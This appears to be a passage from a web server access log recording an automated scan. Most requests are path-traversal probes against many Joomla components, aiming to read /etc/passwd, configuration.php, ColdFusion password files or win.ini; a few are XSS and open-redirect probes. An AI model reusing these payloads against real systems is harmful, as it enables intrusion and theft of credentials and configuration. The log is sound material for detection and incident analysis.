7040 2023-11-09 15:47:33 103.153.214.94 GET /index.php option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 377 2023-11-09 15:48:01 103.153.214.94 GET /index.php option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 385 2023-11-09 15:48:15 103.153.214.94 GET /index.php option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 390 2023-11-09 15:48:23 103.153.214.94 GET /index.php option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 1115 2023-11-09 15:48:25 103.153.214.94 GET /index.php option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 404 2023-11-09 15:48:25 103.153.214.94 GET /index.php option=com_jresearch&controller=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 384 2023-11-09 15:49:50 103.153.214.94 GET /index.php option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 386 2023-11-09 15:50:10 103.153.214.94 GET /status full=true 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 405 2023-11-09 15:50:35 103.153.214.94 GET /index.php option=com_loginbox&view=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 413 2023-11-09 15:50:37 103.153.214.94 GET /index.php option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 389 2023-11-09 15:51:23 103.153.214.94 GET /index.php option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 418 2023-11-09 15:51:27 103.153.214.94 GET /index.php option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 1154 2023-11-09 15:51:35 103.153.214.94 GET /index.php option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 374 2023-11-09 15:51:54 103.153.214.94 GET /index.php option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1147 2023-11-09 15:51:57 103.153.214.94 GET /index.php option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 377 2023-11-09 15:52:22 103.153.214.94 GET /index.php option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 385 2023-11-09 15:53:12 103.153.214.94 GET /index.php option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 393 2023-11-09 15:53:19 103.153.214.94 GET /index.php option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 394 2023-11-09 15:53:53 103.153.214.94 GET /index.php option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1207 2023-11-09 15:54:32 103.153.214.94 GET /index.php option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 383 2023-11-09 15:54:41 103.153.214.94 GET /index.php option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 387 2023-11-09 15:54:44 103.153.214.94 GET /index.php option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 375 2023-11-09 15:55:21 103.153.214.94 GET /index.php option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 378 2023-11-09 15:56:13 103.153.214.94 GET /index.php option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 388 2023-11-09 15:56:30 103.153.214.94 GET /index.php option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 374 2023-11-09 15:56:47 103.153.214.94 GET /red2301.html RedirectUrl=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 380 2023-11-09 15:56:49 103.153.214.94 GET /index.php option=com_tweetla&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 408 2023-11-09 15:57:00 103.153.214.94 GET /index.php option=com_shoutbox&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 376 2023-11-09 15:57:03 103.153.214.94 GET /index.php option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 403 2023-11-09 15:57:14 103.153.214.94 GET /index.php option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 383 2023-11-09 15:58:23 103.153.214.94 GET /index.php option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 390 2023-11-09 15:58:29 103.153.214.94 GET /index.php option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1094 2023-11-09 15:59:07 103.153.214.94 GET /index.php option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 1061 2023-11-09 15:59:15 103.153.214.94 GET /index.php option=com_wmi&controller=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 379 2023-11-09 15:59:55 103.153.214.94 GET /index.php option=com_graphics&controller=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 385 2023-11-09 16:00:13 103.153.214.94 GET /index.php option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 407 2023-11-09 16:00:16 103.153.214.94 GET /index.php option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 386 2023-11-09 16:00:27 103.153.214.94 GET /index.php option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 383 2023-11-09 16:00:42 103.153.214.94 GET /index.php option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 383 2023-11-09 16:01:07 103.153.214.94 GET /index.php option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1157 2023-11-09 16:01:52 103.153.214.94 GET /index.php option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 64 8356 2023-11-09 16:01:54 103.153.214.94 GET /index.php option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 386 2023-11-09 16:01:57 103.153.214.94 GET /index.php option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 383 2023-11-09 16:02:35 103.153.214.94 GET /index.php option=com_market&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 389 2023-11-09 16:03:12 103.153.214.94 GET /index.php option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 382 2023-11-09 16:03:20 103.153.214.94 GET /index.php option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 388 2023-11-09 16:03:51 103.153.214.94 GET /index.php option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 367 2023-11-09 16:04:42 103.153.214.94 GET /lui/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 410 2023-11-09 16:04:44 103.153.214.94 GET /hub/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 377 2023-11-09 16:04:47 103.153.214.94 GET /index.php option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 398 2023-11-09 16:05:09 103.153.214.94 GET /index.php option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 415 2023-11-09 16:05:11 103.153.214.94 GET /index.php option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 382 2023-11-09 16:05:22 103.153.214.94 GET /index.php option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 365 2023-11-09 16:05:37 103.153.214.94 GET /index.php option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 382 2023-11-09 16:05:44 103.153.214.94 GET /index.php option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 380 2023-11-09 16:05:46 103.153.214.94 GET /index.php option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 413 2023-11-09 16:07:04 103.153.214.94 GET /index.php option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1970 2023-11-09 16:07:09 103.153.214.94 GET /index.php option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 400 2023-11-09 16:07:44 103.153.214.94 GET /index.php option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 379 2023-11-09 16:08:00 103.153.214.94 GET /index.php option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 374 2023-11-09 16:08:41 103.153.214.94 GET /index.php option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 373 2023-11-09 16:08:48 103.153.214.94 GET /index.php option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1118 2023-11-09 16:08:52 103.153.214.94 GET /index.php option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 1081 2023-11-09 16:09:12 103.153.214.94 GET /index.php option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 2018 2023-11-09 16:09:24 103.153.214.94 GET /index.php option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 2108 2023-11-09 16:09:59 103.153.214.94 GET /index.php option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 424 2023-11-09 16:10:29 103.153.214.94 GET /index.php option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 1261 2023-11-09 16:10:32 103.153.214.94 GET /index.php option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 381 2023-11-09 16:10:37 103.153.214.94 GET /index.php option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 384 2023-11-09 16:11:23 103.153.214.94 GET /index.php option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 386 2023-11-09 16:11:56 103.153.214.94 GET /index.php option=com_jequoteform&view=../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1136 2023-11-09 16:12:02 103.153.214.94 GET /index.php option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 364 2023-11-09 16:13:26 103.153.214.94 GET /index.php option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 387 2023-11-09 16:13:59 103.153.214.94 GET /index.php option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 422 2023-11-09 16:14:00 103.153.214.94 GET /component/music/album.html cid=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 375 2023-11-09 16:14:14 103.153.214.94 GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 378 2023-11-09 16:14:35 103.153.214.94 GET /index.php option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 375 2023-11-09 16:14:39 103.153.214.94 GET /CFIDE/administrator/enter.cfm locale=../../../../../../../lib/password.properties%00en 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 369 2023-11-09 16:15:17 103.153.214.94 GET /index.php option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 379 2023-11-09 16:15:54 103.153.214.94 GET /index.php option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 408 2023-11-09 16:16:12 103.153.214.94 GET /tiki-jsplugin.php plugin=x&language=../../../../../../../../../../windows/win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 1150 2023-11-09 16:17:21 103.153.214.94 GET /pandora_console/ajax.php page=../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 380 2023-11-09 16:17:29 103.153.214.94 GET /index.php option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 386 2023-11-09 16:17:31 103.153.214.94 GET /index.php option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 376 2023-11-09 16:17:56 103.153.214.94 GET /index.php option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 372 2023-11-09 16:17:59 103.153.214.94 GET /index.php option=com_canteen&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 370 2023-11-09 16:18:38 103.153.214.94 GET /index.php option=com_jejob&view=../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 371 2023-11-09 16:18:47 103.153.214.94 GET /manager/controllers/default/resource/tvs.php class_key=../../../../../../../../../../windows/win.ini%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 376 2023-11-09 16:19:14 103.153.214.94 GET /index.php option=com_jstore&controller=./../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 361 2023-11-09 16:19:26 103.153.214.94 GET /cgi-bin/mj_wwwusr passw&list=GLOBAL&user&func=help&extra=/../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 391 2023-11-09 16:19:28 103.153.214.94 GET /wp-content/plugins/wp-custom-pages/wp-download.php url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1120 2023-11-09 16:20:17 103.153.214.94 GET / action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 391 2023-11-09 16:20:23 103.153.214.94 GET /snarf_ajax.php url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 366 2023-11-09 16:20:43 103.153.214.94 GET /includes/lib/gz.php file=/themes/../../../../../../../../../etc/passwd 443 - 101.35.195.134 